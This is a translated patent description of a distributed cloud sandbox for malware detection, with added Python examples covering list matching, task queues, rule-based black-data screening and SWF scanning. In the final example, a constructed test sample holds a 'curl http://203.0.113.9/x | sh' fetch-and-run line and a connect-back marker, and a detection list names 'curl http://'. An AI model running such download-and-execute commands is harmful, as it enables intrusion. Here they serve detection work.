Alternatively, the client first collects program features and their corresponding program behaviours and sends them to the server side; the server-side database then records the different program features with their corresponding program behaviours, together with the black/white list; with reference to the program features and corresponding program behaviours in the existing known black/white list, unknown program features and program behaviours are analysed in order to update the black/white list.
In this embodiment, because the database records program features and the behaviour records corresponding to those features, unknown programs can be analysed with reference to the known black/white list.
For example, if an unknown program feature is identical to a known program feature in the existing black/white list, the unknown program feature and its program behaviour are both placed in the black/white list; if an unknown program behaviour is identical or similar to a known program behaviour in the existing black/white list, the unknown program behaviour and its program feature are both placed in the black/white list.
In this embodiment, because some viruses can change their signature through techniques such as mutation or packing while their behaviour does not change much, comparative analysis of program behaviour records makes it easier to determine whether an unknown program is a malicious program; sometimes this comparative analysis does not even require further analysis of the program's behaviour, and a simple comparison with the known program behaviours in the existing black/white list is enough to determine the nature of the unknown program. In this embodiment, analysis of the database records shows that some programs have identical or similar behaviours but different program features; in that case, as long as an association between behaviour and feature is established among the programs with identical or similar behaviour, unknown program features and program behaviours can be analysed more easily according to that association, in order to update the black/white list.
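The feature-and-behaviour matching described in the last three paragraphs as an added Python example (example code for this page, not the patent's or the applicant's). The page says only "identical or similar" behaviour; using Jaccard similarity of behaviour sets with a 0.75 cutoff as the similarity measure is an assumption, and the feature strings and behaviour names are constructed. The example goes slightly beyond the text by also building the behaviour-to-feature association the last paragraph mentions.

```python
from dataclasses import dataclass
from typing import Dict, FrozenSet, Optional, Set


@dataclass
class ProgramRecord:
    feature: str                  # constructed: a signature identifying the program
    behavior: FrozenSet[str]      # constructed: the set of behaviours observed


def behavior_similarity(a, b):
    """Jaccard similarity of two behaviour sets (assumed measure of 'similar')."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


class BlackWhiteList:
    """Black/white list keyed by feature, each feature mapping to its behaviour records."""

    def __init__(self, similarity_cutoff=0.75):
        self.lists: Dict[str, Dict[str, Set[FrozenSet[str]]]] = {"black": {}, "white": {}}
        self.cutoff = similarity_cutoff

    def add(self, color, record):
        self.lists[color].setdefault(record.feature, set()).add(record.behavior)

    def classify(self, unknown) -> Optional[str]:
        """Returns 'black', 'white' or None and, on a match, places the unknown program
        (feature and behaviour) in the matching list, as the page describes."""
        # 1. Identical feature: same verdict as the known program.
        for color, entries in self.lists.items():
            if unknown.feature in entries:
                self.add(color, unknown)
                return color
        # 2. Identical or similar behaviour: survives repacking or mutation of the feature.
        best_score, best_color = 0.0, None
        for color, entries in self.lists.items():
            for behaviors in entries.values():
                for behavior in behaviors:
                    score = behavior_similarity(unknown.behavior, behavior)
                    if score > best_score:
                        best_score, best_color = score, color
        if best_color is not None and best_score >= self.cutoff:
            self.add(best_color, unknown)
            return best_color
        return None

    def behavior_groups(self):
        """Association between behaviour and feature: the (list, feature) pairs that
        share an identical behaviour set."""
        groups = {}
        for color, entries in self.lists.items():
            for feature, behaviors in entries.items():
                for behavior in behaviors:
                    groups.setdefault(behavior, []).append((color, feature))
        return groups
```

The ordering of the two checks matters for the page's argument: the feature check is cheap but defeated by packing, while the behaviour check is what catches a repacked variant whose signature no longer appears in the list.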
The embodiment of the present invention provides a method of sample detection. Compared with existing sample detection methods, the embodiment is applied to a distributed cloud detection system that includes multiple single-node sandboxes: multiple pending task information items are determined according to a first preset rule and sent to a shared queue; after at least one request message is received, the task corresponding to each request message is obtained from the shared queue; the multiple single-node sandboxes each execute the tasks distributed to them; the data produced during task execution is obtained and sent to the corresponding database. That is, the distributed cloud detection system is provided with multiple single-node sandboxes that can execute the tasks distributed to them simultaneously, obtain the data produced during task execution and send it to the corresponding database, thereby detecting the samples. Because the samples are detected by multiple single-node sandboxes, a large number of samples need not be detected manually one by one, which reduces the cost of sample detection; and because multiple single-node sandboxes execute different tasks simultaneously, the time consumed by sample detection is reduced and the detection efficiency for samples is improved.
Embodiment two
In another possible implementation of the embodiment of the present invention, on the basis of embodiment one, the operations of steps 201-202 shown in embodiment two (not marked in the figure) are also performed; the operations of steps 203-205 are similar to those of steps 101-103 and are not repeated here.
Step 201: send a task request to the server according to the usage state information of local resources and/or the task backlog status information in the local database.
The task request is used to request task information from the server.
In this embodiment, the Recv process is started to determine the usage state information of local resources and/or the task backlog status information in the local database. In this embodiment, when the usage state information of local resources meets the preset usage state information for local resources, and/or the task backlog status information in the local database meets the preset task backlog state for the local database, a task request message is sent to the server to request task information.
Step 202: receive the task information returned by the server and store the task information in the local database.
If the task information contains task data, storing the task information in the local database specifically includes: compressing the task data, and storing the compressed task data in the local database.
In this embodiment, the Callback process is started to compress all task data by zip and store the compressed task data in the local database.
In this embodiment, all task data is compressed by zip and the compressed task data is stored in the local database; that is, by compressing the data to be stored in the local database, storage space in the local database can be saved.
In this embodiment, the database is cleaned every preset time.
In this embodiment, the database can be cleaned every preset time; the database includes not only the local database but may also include the blacklist database, etc. In this embodiment, after the local database receives a request, it returns the data, and after the return succeeds, it cleans out the data stored in the local database.
In this embodiment, by cleaning the database every preset time, expired data or useless data stored in the database can be cleared out, so that expired or useless data does not occupy the storage space of the database and prevent data that should be stored from being stored; the problem of insufficient database storage space can thus be avoided.
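Steps 201-202 and the periodic cleanup of embodiment two as one added Python example (example code for this page, not the patent's or the applicant's). An in-memory sqlite3 table stands in for the local database, the task data is zip-compressed with `zipfile` before storage as the page states, the preset resource and backlog conditions are modelled as a CPU-usage limit and a backlog limit with assumed values, and "useless" data is taken to mean rows already served; the TTL is likewise an assumption.

```python
import io
import json
import sqlite3
import time
import zipfile


class LocalTaskStore:
    """Local database of task information with zip-compressed task data and
    periodic cleanup. Thresholds and TTL are assumed values."""

    def __init__(self, ttl_seconds=3600, cpu_limit=0.8, backlog_limit=10):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE tasks (task_id TEXT PRIMARY KEY, stored_at REAL, "
                        "served INTEGER, blob BLOB)")
        self.ttl = ttl_seconds
        self.cpu_limit = cpu_limit
        self.backlog_limit = backlog_limit

    # Step 201: the Recv process decides whether to ask the server for more task information.
    def should_request(self, cpu_usage):
        return cpu_usage < self.cpu_limit and self.backlog() < self.backlog_limit

    def backlog(self):
        """Task backlog status: rows not yet handed to a sandbox."""
        return self.db.execute("SELECT COUNT(*) FROM tasks WHERE served = 0").fetchone()[0]

    # Step 202: the Callback process zips the task data before storing it.
    @staticmethod
    def compress(task_data):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr("task.json", json.dumps(task_data))
        return buf.getvalue()

    @staticmethod
    def decompress(blob):
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return json.loads(zf.read("task.json"))

    def store(self, task_id, task_data, now=None):
        """Store compressed task data; returns the stored size in bytes."""
        blob = self.compress(task_data)
        self.db.execute("INSERT OR REPLACE INTO tasks VALUES (?, ?, 0, ?)",
                        (task_id, now if now is not None else time.time(), blob))
        self.db.commit()
        return len(blob)

    def fetch(self, task_id):
        """Return the task data and mark the row served, so cleanup can drop it."""
        row = self.db.execute("SELECT blob FROM tasks WHERE task_id = ?", (task_id,)).fetchone()
        if row is None:
            return None
        self.db.execute("UPDATE tasks SET served = 1 WHERE task_id = ?", (task_id,))
        self.db.commit()
        return self.decompress(row[0])

    def cleanup(self, now=None):
        """Run every preset interval: drop served rows and rows older than the TTL."""
        now = now if now is not None else time.time()
        cur = self.db.execute("DELETE FROM tasks WHERE served = 1 OR stored_at < ?",
                              (now - self.ttl,))
        self.db.commit()
        return cur.rowcount
```

Compression pays off mainly for task data with repetitive content (logs, rendered pages); for already-compressed samples the zip container adds a few dozen bytes of overhead, so a store that mixes both should check the returned size against the raw length before deciding to keep the compressed form.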
Embodiment three
In another possible implementation of the embodiment of the present invention, on the basis of embodiment one, step 103, sending the data produced during task execution to the corresponding database, includes steps 303-304 shown in embodiment three (not marked in the figure), where:
Step 303: according to a second preset rule, screen the data produced during task execution for data belonging to black data.
Step 304: store the data belonging to black data in the black database.
In this embodiment, the data produced during task execution may be called the identification log; the scheduling node extracts the identification log from the cache, classifies it and hands it to the corresponding module for parsing and rule judgement, where various rules are preset inside the module. In this embodiment, the specific rules and the number of rules are not limited; normally the number of rules set can reach several hundred.
For example, when a user opens a web page in a browser and the web page contains an SWF file, the client is automatically woken up to detect the SWF file; if it detects that the SWF file may have a vulnerability, it generates a suspicious sample log for the SWF file. The suspicious sample log includes the signature information of the SWF file, the source information of the SWF file, the URL address of the SWF file, the IP address of the client, etc., and the suspicious sample log is uploaded to the server for further detection.
The sample corresponding to the suspicious sample log is an SWF (Shock Wave Flash) file, the professional format of Adobe's animation software Flash, widely used in fields such as animation production and web page design. The browser application on each client can perform preliminary detection on an SWF file when it runs the file while opening a web page; when it detects that the SWF file may carry a security risk, it uploads the relevant information of the SWF file to the server as a suspicious sample log. In this example the suspicious sample log of each SWF file includes: the signature information of the SWF file, the URL address of the SWF file, the IP address of the client uploading the suspicious sample log, the upload time, the source information of the SWF file, etc. After obtaining the suspicious sample logs for SWF files uploaded by the clients, the server first compares the SWF file signature information in each suspicious sample log to deduplicate the suspicious sample logs corresponding to the same SWF file. For each suspicious sample log remaining after deduplication, the URL address of the SWF file in the log is fed into a sandbox, a browser application is started in the sandbox, a network request for the SWF file corresponding to the log is sent according to the URL address, the SWF file is rendered until rendering completes, the intermediate behaviour of the SWF file during rendering is recorded, and a scan log is obtained; whether the SWF file has a vulnerability is judged from the scan log. If so, a warning message indicating that the SWF file has a vulnerability is sent to all clients that uploaded a suspicious sample log for that SWF file; the warning message can include the number of clients that uploaded suspicious sample logs for the SWF file, the earliest upload time of a suspicious sample log for the SWF file, the source information of the SWF file, the repair patch for the vulnerability of the SWF file, and other information that helps the client understand the vulnerability of the SWF file. Otherwise, a vulnerability detection result indicating that the SWF file has no vulnerability is sent to all clients that uploaded a suspicious sample log for the SWF file, and the unique identifier of the SWF file (such as its signature information) is recorded, so that the next time a suspicious sample log for the SWF file is received from a client, the vulnerability detection result for the SWF file is returned directly to the corresponding client.
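The server-side part of the SWF example (deduplicate logs by signature, scan each unique file once, notify every uploading client, and record clean signatures so repeat uploads are answered without a new scan) as an added Python example. This is example code for this page, not the patent's or the applicant's. The sandbox scan itself is injected as a callable that returns whether the scan log shows a vulnerability; the constructed `constructed_scanner`, the log field names and the placeholder patch text are assumptions.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class SuspiciousSampleLog:
    signature: str      # signature information of the SWF file
    url: str            # URL address of the SWF file
    client_ip: str      # IP address of the uploading client
    upload_time: int    # constructed: seconds since epoch
    source: str         # source information of the SWF file


def constructed_scanner(url):
    """Constructed stand-in for the sandbox render-and-scan step: flags any URL that
    carries the marker 'vuln'. A real scanner judges the recorded scan log instead."""
    return "vuln" in url


class SwfDetectionServer:
    def __init__(self, scanner: Callable[[str], bool]):
        self.scanner = scanner
        self.known_clean: Dict[str, dict] = {}   # signature -> cached clean result
        self.scans = 0                             # sandbox runs actually performed

    @staticmethod
    def dedupe(logs):
        """Group suspicious sample logs by SWF signature (one sandbox run per group)."""
        groups: Dict[str, List[SuspiciousSampleLog]] = {}
        for log in logs:
            groups.setdefault(log.signature, []).append(log)
        return groups

    def process(self, logs):
        """Returns {client_ip: result} for every client that uploaded a log."""
        replies = {}
        for signature, group in self.dedupe(logs).items():
            if signature in self.known_clean:
                result = self.known_clean[signature]          # answered from the record
            else:
                self.scans += 1
                if self.scanner(group[0].url):
                    result = {
                        "vulnerable": True,
                        "reporters": len(group),
                        "first_seen": min(log.upload_time for log in group),
                        "source": group[0].source,
                        "patch": "PLACEHOLDER: repair patch reference (not given on the page)",
                    }
                else:
                    result = {"vulnerable": False}
                    self.known_clean[signature] = result      # unique mark recorded
            for log in group:
                replies[log.client_ip] = result
        return replies
```

Keying the cache only by signature means the clean verdict is trusted for as long as the signature is unchanged; if the server's scan rules are updated, the recorded signatures should be invalidated so that previously clean files are rescanned.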
In this embodiment, by setting rules and using the rules to make judgements, the problem of the detection rate of security software declining because of the uncertainty brought by the various entity mutations and behaviour mutations of malicious programs can be solved quickly. Specifically, the rule-setting function may include parts such as a language description, a visual rule editing interface, a language parser and a dynamic matcher. The language description contains the rule type, rule number, rule ID, random matching ratio, maximum match count limit, return value after matching, and matching condition group. The matching condition group contains multiple matching conditions combined with and, or and not. Each matching condition contains three parts: the matching keyword, the matching operator and the matching target data.
In this embodiment, by classifying the data produced during task execution according to the second preset rule and sending the classified data to the corresponding database, the problem of the detection rate of security software declining because of the uncertainty brought by the various entity mutations and behaviour mutations of malicious programs can be solved quickly.
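The rule language just described (rule type, number, ID, random matching ratio, maximum match count, return value, and a condition group of keyword/operator/target triples combined with and, or, not), together with steps 303-304 that use it to screen identification-log records into black data, as an added Python example. This is example code for this page, not the patent's or the applicant's. The operator set, the record field names, the sample records and the two sample rules are constructed; treating a maximum match count of 0 as unlimited is an assumption.

```python
import operator
import random
import re
from dataclasses import dataclass, field
from typing import Any, List, Union

# Matching operators applied as  record[keyword] OP target  (the set is an assumption).
OPERATORS = {
    "==": operator.eq,
    "!=": operator.ne,
    ">": operator.gt,
    "<": operator.lt,
    "contains": lambda value, target: target in value,
    "matches": lambda value, target: re.search(target, value) is not None,
}


@dataclass
class Condition:
    keyword: str        # field of the identification log record
    op: str             # matching operator
    target: Any         # matching target data


@dataclass
class ConditionGroup:
    logic: str                                              # "and" | "or" | "not"
    items: List[Union[Condition, "ConditionGroup"]] = field(default_factory=list)


@dataclass
class Rule:
    rule_type: str
    number: int
    rule_id: str
    return_value: str           # value returned after a match, e.g. "black"
    group: ConditionGroup
    sample_ratio: float = 1.0   # random matching ratio
    max_matches: int = 0        # maximum match count limit; 0 = unlimited (assumption)
    matches: int = 0


def evaluate(node, record):
    """Evaluate a condition or a nested condition group against one record."""
    if isinstance(node, Condition):
        if node.keyword not in record:
            return False
        return bool(OPERATORS[node.op](record[node.keyword], node.target))
    results = [evaluate(item, record) for item in node.items]
    if node.logic == "and":
        return all(results)
    if node.logic == "or":
        return any(results)
    if node.logic == "not":
        return not any(results)
    raise ValueError("unknown logic: %s" % node.logic)


def apply_rule(rule, record, rng):
    """Return value on a match, honouring the match-count limit and the random
    matching ratio; None otherwise."""
    if rule.max_matches and rule.matches >= rule.max_matches:
        return None
    if rule.sample_ratio < 1.0 and rng.random() >= rule.sample_ratio:
        return None
    if evaluate(rule.group, record):
        rule.matches += 1
        return rule.return_value
    return None


def screen_black_data(records, rules, seed=0):
    """Steps 303-304: split identification log records into black data and the rest."""
    rng = random.Random(seed)
    black, other = [], []
    for rec in records:
        verdict = None
        for rule in rules:
            verdict = apply_rule(rule, rec, rng)
            if verdict == "black":
                break
        (black if verdict == "black" else other).append(rec)
    return black, other


# Constructed identification log records and rules for a stand-alone run.
SAMPLE_RECORDS = [
    {"url": "http://a.example/login.php", "ip": "203.0.113.5", "behaviors": "write_autorun,connect", "score": 90},
    {"url": "http://b.example/index.html", "ip": "192.0.2.8", "behaviors": "open_file", "score": 10},
    {"url": "http://c.example/x.swf", "ip": "203.0.113.5", "behaviors": "", "score": 50},
    {"url": "http://d.example/y.swf", "ip": "203.0.113.5", "behaviors": "", "score": 10},
]


def sample_rules():
    """Fresh rule objects each call (rules carry their own match counters)."""
    return [
        Rule("behavior", 1, "R-001", "black", ConditionGroup("and", [
            Condition("behaviors", "contains", "write_autorun"), Condition("score", ">", 50)])),
        Rule("network", 2, "R-002", "black", ConditionGroup("or", [
            Condition("ip", "==", "203.0.113.5"), Condition("url", "matches", r"\.exe$")]),
             max_matches=1),
    ]
```

The match-count limit and the random matching ratio are what keep a rule set of several hundred entries affordable: a noisy rule stops firing after its quota, and an expensive rule can be sampled rather than applied to every record.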
In this embodiment, after the distributed cloud detection system obtains the identification log, the scheduling node caches the identification log and at the same time stores the cached identification log into the Hadoop cluster system.
In this embodiment, the database is cleaned every preset time.
In this embodiment, the distributed cloud detection system includes the monitoring port Cubestone, which can monitor the entire distributed cloud sandbox system. In this embodiment, Cubestone provides monitoring of all scheduled tasks, for example process performance, task failure rate and the accuracy of task results.
The embodiment of the present invention provides another method of sample detection. By cleaning the database every preset time, expired or useless data stored in the database can be cleared out, so that such data does not occupy the storage space of the database and prevent data that should be stored from being stored, and the problem of insufficient database storage space is avoided. By compressing all task data with zip and storing the compressed task data in the local database, that is, by compressing the data before it is stored in the local database, storage space in the local database is saved. By classifying the data produced during task execution according to the second preset rule and sending the classified data to the corresponding database, the problem of the detection rate of security software declining because of the uncertainty brought by the various entity mutations and behaviour mutations of malicious programs can be solved quickly.
The embodiment of the present invention provides a distributed cloud detection system. As shown in Fig. 2, the distributed cloud detection system includes: a sandbox cluster entry module 21, a single-node sandbox module 22 and a scalable distributed storage cluster module 23, where:
The sandbox cluster entry module 21 is configured to determine multiple pending task information items according to the first preset rule; send the multiple pending task information items to the shared queue; and, after receiving at least one request message, obtain the task information corresponding to each request message from the shared queue.
The single-node sandbox module 22 is configured to execute, by means of multiple single-node sandboxes, the tasks distributed to each of them, and to obtain the data produced during task execution.
The scalable distributed storage cluster module 23 is further configured to send the data produced during task execution by the single-node sandbox module 21 to the corresponding database.
The single-node sandbox module 22 is specifically configured to read the highest-priority task information; determine whether the highest-priority task information contains a specific sample; when it contains a specific sample, amend the specific parameter environment; after the amendment is finished, determine whether to execute the task according to the usage state of current resources and the parameter configuration information in the task information; and, after the task has finished executing, change the corresponding task status.
The single-node sandbox module 22 is further specifically configured to run the task in a virtual machine if it is determined to execute the task, and to store the data produced during the run to local disk.
The single-node sandbox module 22 is further specifically configured to, when the highest-priority task information does not contain a specific sample but only an md5 identifier, download the corresponding sample according to the md5 identifier; determine, according to the number of tasks currently being executed, whether to execute the task containing the sample downloaded by the download module; when it is determined to execute the task containing the downloaded sample, generate a json file according to the sample downloaded by the download module, the json file containing the detailed information of the task; generate a report in the specified format according to the detailed information of the task; and change the corresponding task status.
Further, as shown in Fig. 2, the distributed cloud detection system also includes a single-node sandbox data request and resource cleaning module 24.
The single-node sandbox data request and resource cleaning module 24 is configured to send a task request to the server according to the usage state information of local resources and/or the task backlog status information in the local database, the task request being used to request task information from the server; receive the task information returned by the server; and store the task information in the local database.
The scalable distributed storage cluster module 23 is specifically configured to screen, according to the second preset rule, the data produced during task execution for data belonging to black data, and to store the data belonging to black data in the black database.
The single-node sandbox data request and resource cleaning module 24 is further configured to clean the database every preset time.
Further, as shown in Fig. 2, the distributed cloud detection system also includes a distributed cloud detection system monitoring module 25.
The distributed cloud detection system monitoring module 25 is configured to monitor the sandbox cluster entry module 21, the single-node sandbox module 22, the scalable distributed storage cluster module 23 and the single-node sandbox data request and resource cleaning module 24.
The embodiment of the present invention provides a distributed cloud detection system. Compared with existing sample detection devices, multiple pending task information items are determined according to the first preset rule and sent to the shared queue; after at least one request message is received, the task corresponding to each request message is obtained from the shared queue; the multiple single-node sandboxes each execute the tasks distributed to them; the data produced during task execution is obtained and sent to the corresponding database. That is, the distributed cloud detection system is provided with multiple single-node sandboxes that can execute the tasks distributed to them simultaneously, obtain the data produced during task execution and send it to the corresponding database, thereby detecting the samples. Because the samples are detected by multiple single-node sandboxes, a large number of samples need not be detected manually one by one, which reduces the cost of sample detection; and because multiple single-node sandboxes execute different tasks simultaneously, the time consumed by sample detection is reduced and the detection efficiency for samples is improved.
The distributed cloud detection system provided in the embodiment of the present invention is applicable to the method embodiments above and is not described again here.
The embodiment of the present invention also provides a terminal device. As shown in Fig. 3, for convenience of description only the parts related to the embodiment of the present invention are shown; for specific technical details not disclosed, refer to the method part of the embodiment of the present invention. The terminal device may be any terminal device including a mobile phone, a tablet computer, a PDA (Personal Digital Assistant), a POS (Point of Sales) terminal, a vehicle-mounted computer, etc. Taking a mobile phone as the example device:
Fig. 3 shows a block diagram of part of the structure of a mobile phone related to the terminal provided in the embodiment of the present invention. With reference to Fig. 3, the mobile phone includes: a radio frequency (RF) circuit 310, a memory 320, an input unit 330, a display unit 340, a sensor 350, an audio circuit 360, a wireless fidelity (WiFi) module 370, a processor 380, a power supply 390 and other parts. Those skilled in the art will understand that the mobile phone structure shown in Fig. 3 does not constitute a limitation on the mobile phone; it may include more or fewer parts than shown, combine some parts, or arrange the parts differently.
The components of the mobile phone are described in detail below with reference to Fig. 3:
The RF circuit 310 can be used to receive and send signals while sending and receiving information or during a call; in particular, after receiving downlink information from a base station, it hands it to the processor 380 for processing, and it sends the designed uplink data to the base station. Generally, the RF circuit 310 includes, but is not limited to, an antenna, at least one amplifier, a transceiver, a coupler, a low noise amplifier (LNA), a duplexer, etc. In addition, the RF circuit 310 can also communicate with the network and other devices by wireless communication. The wireless communication can use any communication standard or protocol, including but not limited to Global System of Mobile communication (GSM), General Packet Radio Service (GPRS), Code Division Multiple Access (CDMA), Wideband Code Division Multiple Access (WCDMA), Long Term Evolution (LTE), e-mail, Short Messaging Service (SMS), etc.
The memory 320 can be used to store software programs and modules, and the processor 380 performs the various functional applications and data processing of the mobile phone by running the software programs and modules stored in the memory 320. The memory 320 may mainly include a program storage area and a data storage area, where the program storage area can store the operating system and the application programs needed by at least one function (such as a sound playing function, an image playing function, etc.), and the data storage area can store data created according to the use of the mobile phone (such as audio data, a phone book, etc.). In addition, the memory 320 may include high-speed random access memory and may also include non-volatile memory, for example at least one magnetic disk storage device, flash memory device or other volatile solid-state storage device.
The input unit 330 can be used to receive input numeric or character information and to produce key signal inputs related to user settings and function control of the mobile phone. Specifically, the input unit 330 may include a touch panel 331 and other input devices 332. The touch panel 331, also called a touch screen, collects the user's touch operations on or near it (such as operations performed by the user with a finger, a stylus or any other suitable object or accessory on or near the touch panel 331) and drives the corresponding connection device according to a preset program. Optionally, the touch panel 331 may include two parts, a touch detection device and a touch controller. The touch detection device detects the user's touch position and the signal brought by the touch operation and passes the signal to the touch controller; the touch controller receives the touch information from the touch detection device, converts it into touch point coordinates, sends them to the processor 380, and receives and executes the commands sent by the processor 380. Furthermore, the touch panel 331 may be implemented in various types such as resistive, capacitive, infrared and surface acoustic wave. Besides the touch panel 331, the input unit 330 may also include other input devices 332. Specifically, the other input devices 332 may include, but are not limited to, one or more of a physical keyboard, function keys (such as volume control keys, a switch key, etc.), a trackball, a mouse, a joystick, etc.
The display unit 340 can be used to display information input by the user or information provided to the user, and the various menus of the mobile phone. The display unit 340 may include a display panel 341, which may optionally be configured in the form of a liquid crystal display (LCD), an organic light-emitting diode (OLED) display, etc. Further, the touch panel 331 may cover the display panel 341; when the touch panel 331 detects a touch operation on or near it, it passes it to the processor 380 to determine the type of touch event, and the processor 380 then provides the corresponding visual output on the display panel 341 according to the type of touch event. Although in Fig. 3 the touch panel 331 and the display panel 341 are two independent parts realising the input and output functions of the mobile phone, in some embodiments the touch panel 331 and the display panel 341 may be integrated to realise the input and output functions of the mobile phone.
The mobile phone may also include at least one sensor 350, such as a light sensor, a motion sensor and other sensors. Specifically, the light sensor may include an ambient light sensor and a proximity sensor, where the ambient light sensor can adjust the brightness of the display panel 341 according to the ambient light, and the proximity sensor can turn off the display panel 341 and/or the backlight when the mobile phone is moved to the ear. As one kind of motion sensor, an accelerometer can detect the magnitude of acceleration in all directions (generally three axes) and can detect the magnitude and direction of gravity when stationary; it can be used for applications that recognise the posture of the mobile phone (such as switching between landscape and portrait, related games, magnetometer posture calibration), vibration-recognition related functions (such as a pedometer, tapping), etc. Other sensors that can be configured on the mobile phone, such as a gyroscope, a barometer, a hygrometer, a thermometer and an infrared sensor, are not described here.
The audio circuit 360, a loudspeaker 361 and a microphone 362 can provide the audio interface between the user and the mobile phone. The audio circuit 360 can transmit the electrical signal converted from the received audio data to the loudspeaker 361, which converts it into a sound signal for output; on the other hand, the microphone 362 converts the collected sound signal into an electrical signal, which the audio circuit 360 receives and converts into audio data; the audio data is then output to the processor 380 for processing and sent through the RF circuit 310 to, for example, another mobile phone, or output to the memory 320 for further processing.
WiFi is a short-range wireless transmission technology; through the WiFi module 370 the mobile phone can help the user send and receive e-mail, browse web pages, access streaming media, etc., providing the user with wireless broadband Internet access. Although Fig. 3 shows the WiFi module 370, it can be understood that it is not a necessary component of the mobile phone and can be omitted as needed without changing the essence of the invention.
The processor 380 is the control centre of the mobile phone; it connects the various parts of the whole mobile phone through various interfaces and lines, and performs the various functions of the mobile phone and processes data by running or executing the software programs and/or modules stored in the memory 320 and calling the data stored in the memory 320, thereby monitoring the mobile phone as a whole. Optionally, the processor 380 may include one or more processing units; preferably, the processor 380 may integrate an application processor and a modem processor, where the application processor mainly handles the operating system, user interface and application programs, and the modem processor mainly handles wireless communication. It can be understood that the modem processor may also not be integrated into the processor 380.
Mobile phone also includes the power supply 390 (such as battery) powered to all parts, it is preferred that power supply can pass through power supply pipe Reason system and processor 380 are logically contiguous, so as to realize management charging, electric discharge and power managed by power-supply management system Etc. function.
Although not shown, mobile phone can also include camera, bluetooth module etc., will not be repeated here.
In an embodiment of the present invention, processor 380 included in the device also has the following functions:
determining a plurality of pending task information items according to a first preset rule, and sending the plurality of pending task information items to a shared queue;
after at least one request message is received, obtaining from the shared queue the task information corresponding to each request message, executing the tasks distributed to them respectively through a plurality of single-node sandboxes, and obtaining the data produced during task execution;
sending the data produced during task execution to the corresponding database.
Embodiments of the present invention provide a terminal device. Compared with existing sample detection methods, the embodiment applies to a distributed cloud detection system that includes a plurality of single-node sandboxes. A plurality of pending task information items is determined according to a first preset rule and sent to a shared queue; then, after at least one request message is received, the task corresponding to each request message is obtained from the shared queue, the tasks distributed to the plurality of single-node sandboxes are executed by them respectively, the data produced during task execution is obtained, and that data is sent to the corresponding database. That is, the distributed cloud detection system is provided with a plurality of single-node sandboxes that can execute the tasks distributed to them at the same time, obtain the data produced during task execution and send that data to the corresponding database, so as to detect the samples. Because the samples are detected by a plurality of single-node sandboxes rather than being examined manually one by one, the cost of sample detection is reduced; and because different tasks are executed simultaneously by the plurality of single-node sandboxes, the time spent on sample detection is reduced and the efficiency of sample detection is improved.
The terminal device provided in the embodiment of the present invention can be applied to the method embodiments above, which are not repeated here.
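The queue-and-sandbox flow summarised above, as an added example in Python that is not part of the patent or of the applicant's implementation. The triage rule (`first_preset_rule`), the black-data rule (`second_preset_rule`, `BLACK_INDICATORS`), the sample bytes in `SAMPLES` and the sandbox stand-in `run_in_sandbox` (a token splitter in place of a real virtual-machine run) are all assumptions: the patent names the two rules but does not define them. The example goes slightly beyond the text in two places, also assumptions: identical samples (same md5) are collapsed into one task so that no two sandboxes repeat the same work, and stored records carry a timestamp so that the periodic clean-up of claim 7 can be age-based.

```python
import hashlib
import queue
import threading
import time
from dataclasses import dataclass, field


@dataclass(order=True)
class Task:
    priority: int                          # lower value is dispatched first
    task_id: str = field(compare=False)    # md5 of the sample, as claim 4 identifies samples
    sample: bytes = field(compare=False)


# Constructed inputs (source, sample bytes); assumptions, not real malware.
SAMPLES = [
    ("customer_upload", b"MZ\x90\x00write:log.txt;sleep:5"),
    ("honeypot", b"MZ\x90\x00drop:evil.dll;connect:198.51.100.7:4444"),
    ("crawler", b"#!/bin/sh\ncurl http://203.0.113.9/x | sh\n"),
    ("honeypot", b"MZ\x90\x00drop:evil.dll;connect:198.51.100.7:4444"),  # duplicate
]
# Assumed "second preset rule": an event carrying any of these markers is black data.
BLACK_INDICATORS = ("drop:", "connect:", "curl http://")


def sample_id(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def first_preset_rule(source: str) -> int:
    """Assumed "first preset rule": honeypot hits first, then crawler finds, then uploads."""
    return {"honeypot": 0, "crawler": 1}.get(source, 2)


def determine_pending_tasks(samples) -> queue.PriorityQueue:
    """Turn samples into task information on the shared queue; identical samples (same md5)
    become one task so that no two sandboxes repeat the same work."""
    shared, seen = queue.PriorityQueue(), set()
    for source, data in samples:
        md5 = sample_id(data)
        if md5 not in seen:
            seen.add(md5)
            shared.put(Task(first_preset_rule(source), md5, data))
    return shared


def run_in_sandbox(task: Task) -> dict:
    """Stand-in for a single-node sandbox run: a real node detonates the sample in a VM and
    records behaviour; here every ';' or newline separated token is reported as one event."""
    body = task.sample.decode("latin-1").replace("\n", ";")
    return {"task_id": task.task_id, "events": [e.strip() for e in body.split(";") if e.strip()]}


def second_preset_rule(record: dict) -> bool:
    return any(ind in ev for ev in record["events"] for ind in BLACK_INDICATORS)


class Databases:
    """The 'corresponding database' of claim 1 plus the black database of claim 6;
    cleanup() is the periodic cleaning of claim 7, here driven by record age."""

    def __init__(self):
        self.all_results, self.black, self._lock = {}, {}, threading.Lock()

    def store(self, record: dict) -> None:
        record["stored_at"] = time.time()
        with self._lock:
            self.all_results[record["task_id"]] = record
            if second_preset_rule(record):
                self.black[record["task_id"]] = record

    def cleanup(self, max_age_s: float) -> int:
        now, removed = time.time(), 0
        with self._lock:
            for db in (self.all_results, self.black):
                stale = [k for k, r in db.items() if now - r["stored_at"] > max_age_s]
                for k in stale:
                    del db[k]
                removed += len(stale)
        return removed


def sandbox_node(node_id: str, shared: queue.PriorityQueue, dbs: Databases) -> None:
    """One single-node sandbox; each get() is the 'request message' of claim 1."""
    while True:
        try:
            task = shared.get(timeout=0.2)
        except queue.Empty:
            return
        record = run_in_sandbox(task)
        record["node"] = node_id
        dbs.store(record)


def detect(samples, node_count: int = 2) -> Databases:
    """Run the whole flow with node_count sandboxes pulling from one shared queue."""
    shared, dbs = determine_pending_tasks(samples), Databases()
    nodes = [threading.Thread(target=sandbox_node, args=(f"node-{i}", shared, dbs))
             for i in range(node_count)]
    for n in nodes:
        n.start()
    for n in nodes:
        n.join()
    return dbs


if __name__ == "__main__":
    out = detect(SAMPLES)
    print(len(out.all_results), "results,", len(out.black), "black")
```

Running `detect(SAMPLES)` yields three result records (the duplicate honeypot sample is collapsed), two of which the second preset rule routes to the black database; `cleanup()` then drops records older than the given age from both databases. The `PriorityQueue` stands in for the shared queue, so the highest-priority task information is handed to whichever sandbox asks first.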
